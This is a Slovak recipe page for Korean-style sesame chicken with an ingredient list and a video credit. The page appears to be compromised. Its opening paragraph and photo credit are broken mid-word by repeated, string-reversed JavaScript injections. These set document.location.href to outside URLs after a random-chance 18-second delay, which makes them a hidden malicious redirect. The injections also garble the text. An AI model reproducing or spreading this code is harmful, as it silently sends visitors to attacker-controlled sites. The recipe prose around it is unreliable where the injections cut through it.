Kuracie so sezamom na kórejský spôsob

| 21 októbra, 2017

Kuracie mäso je bezpochyby najväčšou hviezdou väčšiny nevegetariánskych kuchýň. Dá sa toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totiž pripraviť jednoducho, zdravo a možnosti experimentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovania s ním sú snáď nevyčerpateľné. Jednu chutnú vám predvedieme v nasledovnom tipe na rýchly obed. 

Budete potrebovať: 

1 vykostené kura (stehná, prsia alebo kombinácia)

1/2 čajovej lyžičky soli

1/2 čajovej lyžičky mletej papriky alebo čierneho korenia

2 polievkové lyžice kukuričného škrobu

1/4 šálky rastlinného oleja

Na omáčku:

1 polievkovú lyžicu kukuričného škrobu

1 polievkovú lyžicu ryžového octu

2 čajové lyžičky sladkej chili omáčky

½ lyžice opekaného sezamového oleja

1 čajová lyžička balsamikového octu

2 polievkévé lyžice sezamových semienok

cca 3 cm kúsok koreňového zázvoru (strúhaného)

1 strúčik cesnaku (mletého)

2 polievkové lyžice sójovej omáčky 

čerstvá zelená cibuľka na ozdobu

Postup nájdete v priloženom krátkom videu. Dobrú chuť!

Fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a video: youtube.com

Tags:

Category: GOURMET, HOMEPAGE